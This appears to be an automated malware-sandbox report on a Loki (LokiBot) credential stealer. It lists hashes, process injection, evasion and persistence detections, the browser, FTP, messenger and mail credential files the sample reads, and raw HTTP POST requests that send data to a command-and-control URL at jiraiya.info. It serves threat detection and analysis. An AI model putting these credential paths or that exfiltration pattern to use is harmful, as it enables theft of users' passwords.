· 6 years ago · Sep 04, 2019, 12:56 AM
1
2* ID: 882
3* MalFamily: "Loki"
4
5* MalScore: 10.0
6
7* File Name: "Loki_a3b2bcb88650a5852ca8a0485391ce42.1"
8* File Size: 925696
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "af04fe80f80a0b0495958377aa099019d46890dd5fc79a5ea33c87ece98e90cd"
11* MD5: "a3b2bcb88650a5852ca8a0485391ce42"
12* SHA1: "305af5c09f5a3add010e1ee82250d24d310d630c"
13* SHA512: "d6222fa1bb03acd96c2e1cc2b7c6e2ef7749bcdd43ff038e7b429c42a14010adc1a25f78ef643e8e3aa942d9bfe5b318770ab76c756a52ef997a8127c7d88598"
14* CRC32: "CDF8A7A3"
15* SSDEEP: "1536:xOXjYijDzy0bBZI3uMaDvBj5QIZv/uyrszBBYb4VCCVVUjMQvEq2cAGMOyn6gCDp:I3og55QKv9b4PoLvh2cQ27eruRYK"
16
17* Process Execution:
18 "jD4OtDnr.exe",
19 "wscript.exe",
20 "filename.exe",
21 "filename.exe",
22 "explorer.exe",
23 "services.exe",
24 "lsass.exe"
25
26
27* Executed Commands:
28 "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
29 "C:\\Users\\user\\subfolder\\filename.vbs ",
30 "\"C:\\Users\\user\\subfolder\\filename.exe\"",
31 "C:\\Users\\user\\subfolder\\filename.exe ",
32 "C:\\Windows\\system32\\lsass.exe"
33
34
35* Signatures Detected:
36
37 "Description": "Behavioural detection: Executable code extraction",
38 "Details":
39
40
41 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
42 "Details":
43
44
45 "Description": "Possible date expiration check, exits too soon after checking local time",
46 "Details":
47
48 "process": "jD4OtDnr.exe, PID 1428"
49
50
51
52
53 "Description": "Detected script timer window indicative of sleep style evasion",
54 "Details":
55
56 "Window": "WSH-Timer"
57
58
59
60
61 "Description": "A process attempted to delay the analysis task.",
62 "Details":
63
64 "Process": "filename.exe tried to sleep 1624 seconds, actually delayed analysis time by 0 seconds"
65
66
67
68
69 "Description": "Reads data out of its own binary image",
70 "Details":
71
72 "self_read": "process: jD4OtDnr.exe, pid: 1428, offset: 0x00000000, length: 0x000e2000"
73
74
75 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00000000, length: 0x00000040"
76
77
78 "self_read": "process: wscript.exe, pid: 3816, offset: 0x000000f0, length: 0x00000018"
79
80
81 "self_read": "process: wscript.exe, pid: 3816, offset: 0x000001e8, length: 0x00000078"
82
83
84 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018000, length: 0x00000020"
85
86
87 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018058, length: 0x00000018"
88
89
90 "self_read": "process: wscript.exe, pid: 3816, offset: 0x000181a8, length: 0x00000018"
91
92
93 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018470, length: 0x00000010"
94
95
96 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018640, length: 0x00000012"
97
98
99
100
101 "Description": "A process created a hidden window",
102 "Details":
103
104 "Process": "jD4OtDnr.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
105
106
107 "Process": "jD4OtDnr.exe -> C:\\Users\\user\\subfolder\\filename.exe"
108
109
110
111
112 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
113 "Details":
114
115 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
116
117
118 "http_version_old": "HTTP traffic uses version 1.0"
119
120
121 "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
122
123
124
125
126 "Description": "Performs some HTTP requests",
127 "Details":
128
129 "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
130
131
132
133
134 "Description": "A scripting utility was executed",
135 "Details":
136
137 "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
138
139
140
141
142 "Description": "Sniffs keystrokes",
143 "Details":
144
145 "SetWindowsHookExW": "Process: explorer.exe(1884)"
146
147
148
149
150 "Description": "Behavioural detection: Injection (Process Hollowing)",
151 "Details":
152
153 "Injection": "filename.exe(2104) -> filename.exe(3292)"
154
155
156
157
158 "Description": "Executed a process and injected code into it, probably while unpacking",
159 "Details":
160
161 "Injection": "filename.exe(2104) -> filename.exe(3292)"
162
163
164
165
166 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
167 "Details":
168
169 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 5126308 times"
170
171
172
173
174 "Description": "Steals private information from local Internet browsers",
175 "Details":
176
177 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
178
179
180
181
182 "Description": "Installs itself for autorun at Windows startup",
183 "Details":
184
185 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
186
187
188 "data": "C:\\Users\\user\\subfolder\\filename.vbs -cz"
189
190
191
192
193 "Description": "Creates a hidden or system file",
194 "Details":
195
196 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
197
198
199 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
200
201
202
203
204 "Description": "CAPE detected the Loki malware family",
205 "Details":
206
207
208 "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
209 "Details":
210
211 "Malwarebytes": "Trojan.MalPack.VB.Generic"
212
213
214 "Invincea": "heuristic"
215
216
217 "F-Prot": "W32/VBKrypt.ZA.gen!Eldorado"
218
219
220 "Symantec": "ML.Attribute.HighConfidence"
221
222
223 "APEX": "Malicious"
224
225
226 "Paloalto": "generic.ml"
227
228
229 "Sophos": "Mal/FareitVB-N"
230
231
232 "FireEye": "Generic.mg.a3b2bcb88650a585"
233
234
235 "SentinelOne": "DFI - Suspicious PE"
236
237
238 "Cyren": "W32/VBKrypt.ZA.gen!Eldorado"
239
240
241 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
242
243
244 "Endgame": "malicious (high confidence)"
245
246
247 "Acronis": "suspicious"
248
249
250 "Cylance": "Unsafe"
251
252
253 "ESET-NOD32": "a variant of Win32/Injector.EHNM"
254
255
256 "Fortinet": "W32/Injector.EHNM!tr"
257
258
259 "CrowdStrike": "win/malicious_confidence_70% (W)"
260
261
262
263
264 "Description": "Creates a copy of itself",
265 "Details":
266
267 "copy": "C:\\Users\\user\\subfolder\\filename.exe"
268
269
270 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
271
272
273
274
275 "Description": "Drops a binary and executes it",
276 "Details":
277
278 "binary": "C:\\Users\\user\\subfolder\\filename.exe"
279
280
281
282
283 "Description": "Harvests credentials from local FTP client softwares",
284 "Details":
285
286 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
287
288
289 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
290
291
292 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
293
294
295 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
296
297
298 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
299
300
301 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
302
303
304 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
305
306
307 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
308
309
310 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
311
312
313 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
314
315
316
317
318 "Description": "Harvests information related to installed instant messenger clients",
319 "Details":
320
321 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
322
323
324
325
326 "Description": "Harvests information related to installed mail clients",
327 "Details":
328
329 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
330
331
332 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
333
334
335 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
336
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
381
382
383 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
384
385
386 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
387
388
389 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
390
391
392 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
393
394
395 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
396
397
398 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
399
400
401 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
402
403
404 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
405
406
407 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
408
409
410 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
411
412
413 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
414
415
416 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
417
418
419 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
420
421
422 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
423
424
425 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
426
427
428 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
429
430
431 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
432
433
434
435
436 "Description": "Collects information to fingerprint the system",
437 "Details":
438
439
440 "Description": "Created network traffic indicative of malicious activity",
441 "Details":
442
443 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
444
445
446 "signature": "ET TROJAN LokiBot Fake 404 Response"
447
448
449 "signature": "ET TROJAN LokiBot Checkin"
450
451
452 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
453
454
455 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
456
457
458 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
459
460
461 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
462
463
464
465
466
467* Started Service:
468 "VaultSvc"
469
470
471* Mutexes:
472 "Local\\ZoneAttributeCacheCounterMutex",
473 "Local\\ZonesCacheCounterMutex",
474 "Local\\ZonesLockedCacheCounterMutex",
475 "6EFA73A4746045B65DEE781E"
476
477
478* Modified Files:
479 "C:\\Users\\user\\subfolder\\filename.exe",
480 "C:\\Users\\user\\subfolder\\filename.vbs",
481 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
482 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
483
484
485* Deleted Files:
486 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
487 "C:\\Users\\user\\subfolder\\filename.exe"
488
489
490* Modified Registry Keys:
491 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
492 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
493 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
494 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
495 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting",
496 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
497
498
499* Deleted Registry Keys:
500 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
501 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
502 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
503 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
504
505
506* DNS Communications:
507
508 "type": "A",
509 "request": "jiraiya.info",
510 "answers":
511
512 "data": "47.88.102.244",
513 "type": "A"
514
515
516
517
518
519* Domains:
520
521 "ip": "47.88.102.244",
522 "domain": "jiraiya.info"
523
524
525
526* Network Communication - ICMP:
527
528* Network Communication - HTTP:
529
530 "count": 2,
531 "body": "",
532 "uri": "http://jiraiya.info/joe23/five/fre.php",
533 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
534 "method": "POST",
535 "host": "jiraiya.info",
536 "version": "1.0",
537 "path": "/joe23/five/fre.php",
538 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
539 "port": 80
540
541
542 "count": 27,
543 "body": "",
544 "uri": "http://jiraiya.info/joe23/five/fre.php",
545 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
546 "method": "POST",
547 "host": "jiraiya.info",
548 "version": "1.0",
549 "path": "/joe23/five/fre.php",
550 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
551 "port": 80
552
553
554
555* Network Communication - SMTP:
556
557* Network Communication - Hosts:
558
559 "country_name": "United States",
560 "ip": "47.88.102.244",
561 "inaddrarpa": "",
562 "hostname": "jiraiya.info"
563
564
565
566* Network Communication - IRC: